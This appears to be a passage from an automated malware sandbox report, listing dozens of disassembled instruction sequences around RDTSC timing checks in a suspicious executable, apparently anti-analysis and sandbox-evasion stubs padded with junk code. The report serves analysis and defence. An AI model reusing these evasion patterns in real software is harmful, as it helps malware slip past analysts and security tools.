Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EA6A10 second address: EA6A4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43C8AE0087h 0x0000000f jmp 00007F43C8AE0081h 0x00000014 popad 0x00000015 je 00007F43C8AE00B0h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EA6A4D second address: EA6A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EA65C2 second address: EA65C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EABDC3 second address: EABDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EABDD4 second address: EABDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43C8AE0076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EABDDF second address: EABE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F43C9098CE6h 0x0000000b pop eax 0x0000000c jc 00007F43C9098CEAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jng 00007F43C9098CE6h 0x00000020 jmp 00007F43C9098CF0h 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F43C9098CEAh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC3BD9 second address: EC3BF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F43C8AE0081h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC3BF7 second address: EC3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC29E9 second address: EC29F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC29F2 second address: EC2A2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CF2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F43C9098CFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC2A2E second address: EC2A38 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC9B03 second address: EC9B27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F43C9098CFAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC9854 second address: EC985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC985A second address: EC985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC985E second address: EC9862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC9862 second address: EC986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43C9098CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EC986E second address: EC9874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: ED44B9 second address: ED44DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EDC813 second address: EDC819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EDC819 second address: EDC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EDC81D second address: EDC83B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EE9054 second address: EE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EEA6E2 second address: EEA6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EEA6E6 second address: EEA6EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EEA6EB second address: EEA6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EEA6F8 second address: EEA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EEA6FE second address: EEA704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EED861 second address: EED86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EED86A second address: EED871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EED580 second address: EED584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06F0C second address: F06F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C8AE0087h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06F37 second address: F06F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F43C9098CE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F43C9098CF3h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06F7C second address: F06F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F05E80 second address: F05E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F05E84 second address: F05E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F0643D second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06445 second address: F06455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C9098CEAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06455 second address: F0645C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06985 second address: F06989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06989 second address: F0699B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F0699B second address: F069B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43C9098CF1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F069B8 second address: F069BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F069BC second address: F069C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: F06C6D second address: F06C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410033 second address: 541003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 22h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541003A second address: 5410040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410040 second address: 5410077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, AB49h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F43C9098CF4h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5410077 second address: 541007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541007B second address: 541007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 541007F second address: 5410085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0E64 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0E85 second address: 53F0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bh, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C8AE0080h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0EA2 second address: 53F0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0EC9 second address: 53F0ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0ED9 second address: 53F0F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F43C9098CF7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F2B second address: 5430F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F3A second address: 5430F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F3E second address: 5430F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F4E second address: 5430F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F52 second address: 5430F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F56 second address: 5430F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F5C second address: 5430F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5430F62 second address: 5430F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D008F second address: 53D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43C8AE007Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 pushfd 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 sub ah, FFFFFFC6h 0x0000001c jmp 00007F43C8AE0081h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D00F8 second address: 53D0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0185 second address: 53D018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D018B second address: 53D0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0C2C second address: 53F0C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0C32 second address: 53F0C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0C36 second address: 53F0C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0C3A second address: 53F0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov si, 5469h 0x0000000e jmp 00007F43C9098CF6h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F43C9098CF0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F43C9098CF7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0C8D second address: 53F0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 340672BAh 0x00000008 mov dh, 00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F073B second address: 53F0764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F43C9098CEAh 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F43C9098CECh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0656 second address: 53F065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F065C second address: 53F0693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C9098CEBh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43C9098CF0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0693 second address: 53F0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0697 second address: 53F069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F069D second address: 53F06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F06A3 second address: 53F06DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F06DC second address: 53F06E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F06E2 second address: 53F06E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F03F4 second address: 53F0436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C8AE0081h 0x00000008 pop esi 0x00000009 call 00007F43C8AE0081h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE007Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0436 second address: 53F0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0450 second address: 53F046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F046E second address: 53F0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0472 second address: 53F0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400225 second address: 5400247 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400247 second address: 540026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 540026B second address: 5400285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5400285 second address: 54002E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B5E4h 0x00000007 pushfd 0x00000008 jmp 00007F43C8AE007Dh 0x0000000d sub ah, 00000026h 0x00000010 jmp 00007F43C8AE0081h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F43C8AE0083h 0x00000022 call 00007F43C8AE0088h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
